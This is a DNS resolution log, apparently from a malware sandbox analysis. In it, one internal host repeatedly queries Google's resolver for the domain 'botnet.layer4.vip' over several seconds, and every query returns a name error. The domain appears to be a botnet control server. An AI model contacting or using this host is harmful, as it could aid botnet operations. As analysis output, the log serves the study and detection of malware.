                                  Apr 9, 2023 03:32:01.292640924 CEST8.8.8.8192.168.2.230x9213Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.333488941 CEST8.8.8.8192.168.2.230x9213Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.349425077 CEST8.8.8.8192.168.2.230x9213Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.389113903 CEST8.8.8.8192.168.2.230x44e1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.405045033 CEST8.8.8.8192.168.2.230x44e1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.445383072 CEST8.8.8.8192.168.2.230x44e1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.461427927 CEST8.8.8.8192.168.2.230x44e1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.485532045 CEST8.8.8.8192.168.2.230x73e7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.541212082 CEST8.8.8.8192.168.2.230x73e7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.557018995 CEST8.8.8.8192.168.2.230x73e7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.581214905 CEST8.8.8.8192.168.2.230x810aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.596775055 CEST8.8.8.8192.168.2.230x810aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.612277985 CEST8.8.8.8192.168.2.230x810aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.667901993 CEST8.8.8.8192.168.2.230xbdcaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.797754049 CEST8.8.8.8192.168.2.230xa5dbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.813661098 CEST8.8.8.8192.168.2.230xa5dbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.847321033 CEST8.8.8.8192.168.2.230xa5dbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.864254951 CEST8.8.8.8192.168.2.230x370Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.913297892 CEST8.8.8.8192.168.2.230x370Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.953638077 CEST8.8.8.8192.168.2.230x370Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.977860928 CEST8.8.8.8192.168.2.230x9fefName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.993779898 CEST8.8.8.8192.168.2.230x9fefName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.041344881 CEST8.8.8.8192.168.2.230x9fefName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.112351894 CEST8.8.8.8192.168.2.230xe90fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.128248930 CEST8.8.8.8192.168.2.230xe90fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.288239002 CEST8.8.8.8192.168.2.230x723bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.343774080 CEST8.8.8.8192.168.2.230xf8b8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.384115934 CEST8.8.8.8192.168.2.230xf8b8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.399743080 CEST8.8.8.8192.168.2.230xf8b8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.415422916 CEST8.8.8.8192.168.2.230xf8b8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.431380033 CEST8.8.8.8192.168.2.230xe499Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.478542089 CEST8.8.8.8192.168.2.230xe499Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.494159937 CEST8.8.8.8192.168.2.230xe499Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.518518925 CEST8.8.8.8192.168.2.230x1dc8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.566870928 CEST8.8.8.8192.168.2.230x1dc8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.649565935 CEST8.8.8.8192.168.2.230x8436Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.698883057 CEST8.8.8.8192.168.2.230x8436Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.723155022 CEST8.8.8.8192.168.2.230x4a0cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.794867039 CEST8.8.8.8192.168.2.230x4a0cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.858844995 CEST8.8.8.8192.168.2.230xc6feName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.874836922 CEST8.8.8.8192.168.2.230xc6feName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.915632010 CEST8.8.8.8192.168.2.230x609aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.940057039 CEST8.8.8.8192.168.2.230x609aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.972600937 CEST8.8.8.8192.168.2.230x609aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.997092962 CEST8.8.8.8192.168.2.230xc899Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.028572083 CEST8.8.8.8192.168.2.230xc899Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.053643942 CEST8.8.8.8192.168.2.230xc899Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.069485903 CEST8.8.8.8192.168.2.230xc899Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.094001055 CEST8.8.8.8192.168.2.230x4677Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.118524075 CEST8.8.8.8192.168.2.230x4677Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.159666061 CEST8.8.8.8192.168.2.230x4677Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.208612919 CEST8.8.8.8192.168.2.230xbd26Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.289452076 CEST8.8.8.8192.168.2.230xd784Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.305109024 CEST8.8.8.8192.168.2.230xd784Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.321111917 CEST8.8.8.8192.168.2.230xd784Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.387026072 CEST8.8.8.8192.168.2.230x146aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.402996063 CEST8.8.8.8192.168.2.230x146aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.443428993 CEST8.8.8.8192.168.2.230x146aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.459460974 CEST8.8.8.8192.168.2.230x146aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.508384943 CEST8.8.8.8192.168.2.230xe8a3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.548855066 CEST8.8.8.8192.168.2.230xe8a3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.605998993 CEST8.8.8.8192.168.2.230x2de7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.630475044 CEST8.8.8.8192.168.2.230x2de7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.654663086 CEST8.8.8.8192.168.2.230x2de7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.702852011 CEST8.8.8.8192.168.2.230x40a7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.750509977 CEST8.8.8.8192.168.2.230x40a7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.807445049 CEST8.8.8.8192.168.2.230xc0beName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.846978903 CEST8.8.8.8192.168.2.230xc0beName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.935420990 CEST8.8.8.8192.168.2.230x1104Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.016343117 CEST8.8.8.8192.168.2.230x8d8cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.089463949 CEST8.8.8.8192.168.2.230x8d8cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.105088949 CEST8.8.8.8192.168.2.230x3a96Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.129509926 CEST8.8.8.8192.168.2.230x3a96Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.153700113 CEST8.8.8.8192.168.2.230x3a96Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.178159952 CEST8.8.8.8192.168.2.230x3a96Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.202656031 CEST8.8.8.8192.168.2.230x3a96Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.227339983 CEST8.8.8.8192.168.2.230x437bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.323523045 CEST8.8.8.8192.168.2.230x658fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.443763018 CEST8.8.8.8192.168.2.230x838fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.459671974 CEST8.8.8.8192.168.2.230x838fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.499715090 CEST8.8.8.8192.168.2.230x838fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.531188011 CEST8.8.8.8192.168.2.230x8d97Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.546858072 CEST8.8.8.8192.168.2.230x8d97Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.689150095 CEST8.8.8.8192.168.2.230xf261Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.704757929 CEST8.8.8.8192.168.2.230xf261Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.741312027 CEST8.8.8.8192.168.2.230xf261Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.821214914 CEST8.8.8.8192.168.2.230x9158Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.836819887 CEST8.8.8.8192.168.2.230x9158Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.852695942 CEST8.8.8.8192.168.2.230x9158Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.901076078 CEST8.8.8.8192.168.2.230xe40aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.940677881 CEST8.8.8.8192.168.2.230xe40aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.972273111 CEST8.8.8.8192.168.2.230x5772Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.076787949 CEST8.8.8.8192.168.2.230xbaa0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.092365980 CEST8.8.8.8192.168.2.230xbaa0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.116714001 CEST8.8.8.8192.168.2.230xbaa0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.237831116 CEST8.8.8.8192.168.2.230x7c62Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.253420115 CEST8.8.8.8192.168.2.230x7c62Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.301908016 CEST8.8.8.8192.168.2.230x7c61Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.325998068 CEST8.8.8.8192.168.2.230x7c61Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.357556105 CEST8.8.8.8192.168.2.230x7c61Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.382010937 CEST8.8.8.8192.168.2.230x7c61Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.422364950 CEST8.8.8.8192.168.2.230x6c58Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.462804079 CEST8.8.8.8192.168.2.230x6c58Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.494261026 CEST8.8.8.8192.168.2.230x9a1cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.509819984 CEST8.8.8.8192.168.2.230x9a1cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.525825977 CEST8.8.8.8192.168.2.230x9a1cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.550322056 CEST8.8.8.8192.168.2.230x9a1cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.581964016 CEST8.8.8.8192.168.2.230x7142Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.597512960 CEST8.8.8.8192.168.2.230x7142Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.629473925 CEST8.8.8.8192.168.2.230x7142Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.653989077 CEST8.8.8.8192.168.2.230x7142Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.702076912 CEST8.8.8.8192.168.2.230x1ac5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.733304024 CEST8.8.8.8192.168.2.230x1ac5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.773648024 CEST8.8.8.8192.168.2.230x44dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.797986984 CEST8.8.8.8192.168.2.230x44dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.813493013 CEST8.8.8.8192.168.2.230x44dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.877808094 CEST8.8.8.8192.168.2.230xdd84Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.908900976 CEST8.8.8.8192.168.2.230xdd84Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.933454037 CEST8.8.8.8192.168.2.230xdd84Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.007409096 CEST8.8.8.8192.168.2.230x33eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.023255110 CEST8.8.8.8192.168.2.230x33eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.103584051 CEST8.8.8.8192.168.2.230xa554Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.119497061 CEST8.8.8.8192.168.2.230xa554Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.143718958 CEST8.8.8.8192.168.2.230xa554Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.159534931 CEST8.8.8.8192.168.2.230x6927Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.199556112 CEST8.8.8.8192.168.2.230x6927Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.239638090 CEST8.8.8.8192.168.2.230x6927Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.255718946 CEST8.8.8.8192.168.2.230xbb2cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.271855116 CEST8.8.8.8192.168.2.230xbb2cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.312285900 CEST8.8.8.8192.168.2.230xbb2cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.327980995 CEST8.8.8.8192.168.2.230xbb2cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.383948088 CEST8.8.8.8192.168.2.230xc44cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.408704042 CEST8.8.8.8192.168.2.230xc44cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.458425999 CEST8.8.8.8192.168.2.230xd19bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.508100033 CEST8.8.8.8192.168.2.230xd19bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.524333954 CEST8.8.8.8192.168.2.230xd19bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.549427986 CEST8.8.8.8192.168.2.230xd19bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.581491947 CEST8.8.8.8192.168.2.230xee9bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.597517967 CEST8.8.8.8192.168.2.230xee9bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.645384073 CEST8.8.8.8192.168.2.230xb02Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.685739040 CEST8.8.8.8192.168.2.230xb02Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.701378107 CEST8.8.8.8192.168.2.230xb02Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.725860119 CEST8.8.8.8192.168.2.230xb02Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.741995096 CEST8.8.8.8192.168.2.230xb625Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.782340050 CEST8.8.8.8192.168.2.230xb625Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.857029915 CEST8.8.8.8192.168.2.230xd49dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.888958931 CEST8.8.8.8192.168.2.230xd49dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.905111074 CEST8.8.8.8192.168.2.230xd49dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.930104971 CEST8.8.8.8192.168.2.230xd49dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.042893887 CEST8.8.8.8192.168.2.230xafa0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.066941977 CEST8.8.8.8192.168.2.230xafa0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.091214895 CEST8.8.8.8192.168.2.230xafa0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.106862068 CEST8.8.8.8192.168.2.230xafa0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.180802107 CEST8.8.8.8192.168.2.230xf591Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.205898046 CEST8.8.8.8192.168.2.230xf591Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.246016026 CEST8.8.8.8192.168.2.230xf591Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.270791054 CEST8.8.8.8192.168.2.230xaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.286612034 CEST8.8.8.8192.168.2.230xaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.311516047 CEST8.8.8.8192.168.2.230xaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.335690022 CEST8.8.8.8192.168.2.230xaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.375786066 CEST8.8.8.8192.168.2.230x8750Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.391655922 CEST8.8.8.8192.168.2.230x8750Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.423156977 CEST8.8.8.8192.168.2.230x8750Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.447283983 CEST8.8.8.8192.168.2.230x8750Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.536109924 CEST8.8.8.8192.168.2.230x2adbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.576482058 CEST8.8.8.8192.168.2.230x9528Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.600560904 CEST8.8.8.8192.168.2.230x9528Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.616074085 CEST8.8.8.8192.168.2.230x9528Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.631928921 CEST8.8.8.8192.168.2.230x9528Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.656430960 CEST8.8.8.8192.168.2.230x9528Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.671967030 CEST8.8.8.8192.168.2.230x4bb5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.711616039 CEST8.8.8.8192.168.2.230x4bb5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.735995054 CEST8.8.8.8192.168.2.230x4bb5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.760149002 CEST8.8.8.8192.168.2.230x4bb5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.791611910 CEST8.8.8.8192.168.2.230xabName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.816456079 CEST8.8.8.8192.168.2.230xabName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.840847969 CEST8.8.8.8192.168.2.230xabName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.889667034 CEST8.8.8.8192.168.2.230xa91aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.905591965 CEST8.8.8.8192.168.2.230xa91aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.930195093 CEST8.8.8.8192.168.2.230xa91aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.946034908 CEST8.8.8.8192.168.2.230xa91aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.002300024 CEST8.8.8.8192.168.2.230xe9d1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.026500940 CEST8.8.8.8192.168.2.230xe9d1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.066852093 CEST8.8.8.8192.168.2.230xe9d1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.098253012 CEST8.8.8.8192.168.2.230x1f02Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:08.122296095 CEST8.8.8.8192.168.2.230x1f02Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
